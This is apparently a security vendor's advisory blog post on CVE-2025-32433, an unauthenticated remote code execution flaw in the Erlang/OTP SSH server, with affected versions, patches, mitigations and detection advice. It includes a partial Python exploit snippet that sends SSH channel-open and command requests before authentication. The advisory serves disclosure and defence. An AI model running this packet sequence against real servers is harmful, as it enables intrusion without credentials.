Cybersecurity blog header

CVE-2025-32433: Remote Code Execution in Erlang/OTP SSH Server

- S.T.A².R.S Team

CVE-2025-32433 is easily exploitable, which is why it is considered critical

CVE-2025-32433 allows remote code execution on the Erlang/OTP SSH server without prior authentication

CVE-2025-32433, a critical vulnerability affecting the SSH server implemented in Erlang/OTP (Open Telecom Platform), has been made public.

This vulnerability allows remote code execution without prior authentication by sending specifically crafted protocol packets during an incomplete SSH session. Given its very low exploitation complexity and its total impact on the confidentiality, integrity, and availability of the system, this threat has been classified as critical.

A few days after its disclosure, multiple public exploits emerged, significantly increasing the risk of active exploitation in the short term.

Main characteristics of CVE-2025-32433

The main characteristics of the vulnerability are outlined below:

  • CVE Identifier: CVE-2025-32433.
  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H (10.0 Critical).
  • Publication date: 16/04/2025.
  • Affected software: Erlang/OTP (versions 25.x, 26.x, 27.x).
  • Exploitation requirements:
    • Network access to the port where the Erlang/OTP SSH server is listening.
    • No prior authentication required.
    • No user interaction required.
  • Affected versions:
    • OTP 25. Until 25.3.2.19.
    • OTP 26. Until 26.2.5.10.
    • OTP 27. Until 27.3.2.

Exploitation process

This vulnerability does not involve memory corruption, buffer overflows (BOF), or other complex conditions. It is purely a protocol logic flaw: the Erlang/OTP SSH server processes channel opening and command execution requests before the authentication process is completed.

A functional exploit follows these steps:

  1. Establish a TCP SSH session.
  2. Exchange banners.
  3. Send an SSH_MSG_KEXINIT packet.
  4. Send an SSH_MSG_CHANNEL_OPEN packet.
  5. Send an SSH_MSG_CHANNEL_REQUEST with an arbitrary command.

Key exploit snippet:

#1. Establish a TCP SSH session
socket.create_connection((HOST, PORT), timeout=5)

# 2. Exchange SSH banners
s.sendall(b"SSH-2.0-OpenSSH_8.9\r\n")
banner = s.recv(1024)

# 3. Send SSH_MSG_KEXINIT (initiate key exchange)
kex_packet = build_kexinit()
s.sendall(pad_packet(kex_packet))

# 4. Send SSH_MSG_CHANNEL_OPEN (open channel without authentication)
chan_open = build_channel_open()
s.sendall(pad_packet(chan_open))

# 5. Send SSH_MSG_CHANNEL_REQUEST (execute arbitrary command)
chan_req = build_channel_request(
command='file:write_file("/lab.txt", <<"pwned">>).' 
)
s.sendall(pad_packet(chan_req))

Mitigation of CVE-2025-32433

The main solution is to update to the patched versions:

  • OTP 25.3.2.20.
  • OTP 26.2.5.11.
  • OTP 27.3.3.

In environments where immediate patching is not possible, it is recommended to:

  • Disable the Erlang/OTP SSH server if not essential.
  • Restrict SSH port access using firewalls or ACLs.
  • Monitor for anomalous connection attempts to the Erlang/OTP SSH service.

Vulnerability detection

The presence of the CVE-2025-32433 can be identified by checking the installed Erlang/OTP version on the system. This can be done using commands such as erl -version or by inspecting the list of installed packages to verify whether a vulnerable version is in use.

Tarlogic has an emerging vulnerability service that proactively and continuously monitors the security perimeter of companies to urgently report, detect, and notify the presence of this vulnerability and any other weaknesses that may pose a critical threat that could seriously impact the security of corporate assets.